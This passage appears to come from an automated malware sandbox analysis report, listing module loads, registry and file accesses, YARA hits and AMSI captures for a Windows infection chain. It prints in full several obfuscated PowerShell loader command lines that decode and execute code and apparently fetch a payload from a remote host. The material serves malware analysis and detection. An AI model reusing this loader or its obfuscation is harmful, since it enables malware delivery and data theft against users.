        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: napinsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: pnrpnsp.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshbth.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: nlaapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winrnr.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iphlpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mswsock.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: winnsi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dnsapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rasadhlp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: fwpuclnt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: schannel.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: mskeyprotect.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ntasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: dpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: gpapi.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncrypt.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: ncryptsslp.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: msvcp140.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: vcruntime140_1.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: cdprt.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: smartscreenps.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: dui70.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: duser.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: windows.ui.fileexplorer.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: uiribbon.dllJump to behavior
        Source: C:\Windows\explorer.exeSection loaded: networkexplorer.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wtsapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: samcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wininet.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: ieframe.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: netapi32.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: winhttp.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wkscli.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: secur32.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: mlang.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: winsqlite3.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: vaultcli.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeSection loaded: windowscodecs.dllJump to behavior
        Source: C:\Windows\SysWOW64\cmd.exeSection loaded: ntmarta.dllJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: actxprxy.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wintypes.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.staterepositoryps.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: uxtheme.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptdlg.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msoert2.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msimg32.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wininet.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sspicli.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: cryptui.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msftedit.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: kernel.appcore.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: windows.storage.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: wldp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: profapi.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: propsys.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: edputil.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: apphelp.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: explorerframe.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: sxs.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: msasn1.dll
        Source: C:\Program Files (x86)\Windows Mail\wab.exeSection loaded: iertutil.dll
        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeFile written: C:\Users\user\AppData\Roaming\834O80R0\834logri.iniJump to behavior
        Source: C:\Program Files (x86)\Windows Mail\wab.exeFile opened: C:\Windows\SysWOW64\msftedit.dll
        Source: Window RecorderWindow detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
        Source: C:\Windows\SysWOW64\raserver.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Office\15.0\Outlook\Profiles\Outlook\Jump to behavior
        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: System.Core.pdb122658-3693405117-2476756634-1003_Classes\WOW6432Node\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931}\InprocServer32 source: powershell.exe, 00000010.00000002.1845941014.00000000073D0000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: .Management.Automation.pdb source: powershell.exe, 00000010.00000002.1845941014.0000000007324000.00000004.00000020.00020000.00000000.sdmp
        Source: Binary string: wntdll.pdb source: wab.exe, raserver.exe
        Source: Binary string: RAServer.pdb source: raserver.exe
        Source: Binary string: ystem.Management.Automation.pdb source: powershell.exe, 00000010.00000002.1849877710.0000000008470000.00000004.00000020.00020000.00000000.sdmp

        Data Obfuscation

        barindex
        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: ShellExecute("POWERSHELL", ""cls;write 'Fantasibilledernes Ansttels", "", "", "0");
        Source: Yara matchFile source: 00000014.00000002.1970441632.0000000006340000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.1851059403.000000000C1B0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.1850596565.00000000086A0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.1839918830.0000000005A41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 0000000C.00000002.2072484963.000001A8D5541000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Scyphiform245)$global:Bonaire = [System.Text.Encoding]::ASCII.GetString($Unantiquated)$global:Prioritetshaverens=$Bonaire.substring($Marmorgulvenes,$Renhedsgraders)<#Kapselaabnere De
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Glutinate $Roup $Uncollared), (Skjortenaales142 @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Congresses = [AppDomain]::CurrentDomain.GetAssemblies()$glo
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Cassare)), [System.Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule($Slyngelstregs, $false).DefineType($Banshee, $Beke
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Scyphiform245)$global:Bonaire = [System.Text.Encoding]::ASCII.GetString($Unantiquated)$global:Prioritetshaverens=$Bonaire.substring($Marmorgulvenes,$Renhedsgraders)<#Kapselaabnere De
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn A,vgFrdi=anet$BlomSBombkSlanu Re.mTakirNa oeDeted rateFrolsSkri.Jords RegpEvanl .ipiAerotBrne(He e$FornM ResiOve.nHvidtorobyKo i)ba,a ');Fluorideringen (Jimmis ' er[deerNBlomeK.sttNig,.ReveSCohaeSlumrSk.fvPro,iKni c ybeTandPFrago Ob iDetan Hu,tArr.MBogbaGorenGra.aNonbgHjste Ungr raa]afgr:Fors: SukSunteedevocJantuLighrVoksiSmletCol.yM.toPPro rTahio.ourt Aflo UdvcLynto N,tl Til Scin= bin Dis,[Br dN DeveD,litObtu.LubeS kaeSmugc Resu SclrQuediInfrtZardy HyaPUnprrlrdooScout CraoMalpcmi,io OsclOplaT ordyNeappRe aeHaak] cuc:Sh
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "cls;write 'Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering Fantasibilledernes Ansttelsesomraadets Grammates Methodizing Skumredes Synostose Macrotone Guls Scyphiform245 Nonconservation Mirks171 Bonaire Vejrskifte Tekstspalte Forsorgshjemmets Rhyton Skoenne Fullbacks Solbadets Afsnitsindrykningerne Bordeauxvine tyngende Sporingsstationens afnazificering';If (${host}.CurrentCulture) {$Fortrd++;}Function Jimmis($Poria){$Jumpily=$Poria.Length-$Fortrd;$Anteopercle='SUBsTRI';$Anteopercle+='ng';For( $Racialisation=4;$Racialisation -lt $Jumpily;$Racialisation+=5){$Fantasibilledernes+=$Poria.$Anteopercle.Invoke( $Racialisation, $Fortrd);}$Fantasibilledernes;}function Fluorideringen($Uncouthly){ . ($Flanconnade) ($Uncouthly);}$Hoosegow=Jimmis 'Un.eMSklvoFlipz ,deiR,prlSpa lk,nnaAlle/Or,i5tilb. ,dn0Bran Sam,(UndeWCrediJo.nnImprdUdsno Udlw HorsBesl aldNBemyTPrim Vas.1Neig0 Kem.Irri0,lde;Bl,t .onaWRe,aiPaahn .on6 Tre4Wagg; arm Bru.xK rs6Nost4Educ; Wo. CounrklorvB.ot:Lysa1regn2Fald1Xmas. Ans0 S.d)Elek KrooGUstiemuhacRestk acoo S.j/came2 P,e0Pa.r1Sk m0Skil0H al1Radr0Foot1Vomi CharFTovaiStikrLeveeOverf FrdoGoloxBrss/unde1Majo2 enn1Okke.Prdi0S,nn ';$Neurocanal151=Jimmis 'UlydUEmpesSloweIlsarQ,nd- .laA PrigInteeGleanFishtskin ';$Skumredes=Jimmis 'BrochSp,ktbookt .onpfac,sStri:Male/ Afa/ Carl DisaRafrrBiocrSvelyB,cof Undr AngaPre,n UngkBree.StancMaybpPal.a ,an/HereN.bekeU,orgDiamuAnoms M t8Cons5Eoga.S.udcIdylshe,lv Gra ';$Minty=Jimmis 'Mero>Jamr ';$Flanconnade=Jimmis ' M.liSidee Sslx.ype ';$Lansquenet='Guls';$Andejagterne = Jimmis 'VelkeSlaucFl.nhNontohydr L.m%Aadsapa.ap SubpForsdCa iaviv.tMiddaP,la%Semi\SikkC SidoE,tanRskncToogoRdbyrSpaddPersaCo elOhmm6 yd.MounU chedHydasForb Am m&Gall& St. SingeMoancT,reh Truo Ade Forbt Hyp ';Fluorideringen (Jimmis 'Piep$.lyhgTreblAc roAntib Arbakumeltest: F.lMW.ttykryso ,hapres.lObfuaFumisHoustSwaniLaarcKons=E,te(HavfcLsevm Litd Sv. ok e/R ascMonc ,mmi$Da,eA Ke niri,dHoddeber j entaAx igParatCodaeIdenrUnpen kiheU.ad)Symp ');Fluorideringen (Jimmis 'Bdep$MirkgWea.lPreco Sexb UheaEighlVgel:DenoM UnseGodit,ambh ageosk,ldRe pi P.ezOminiRealn 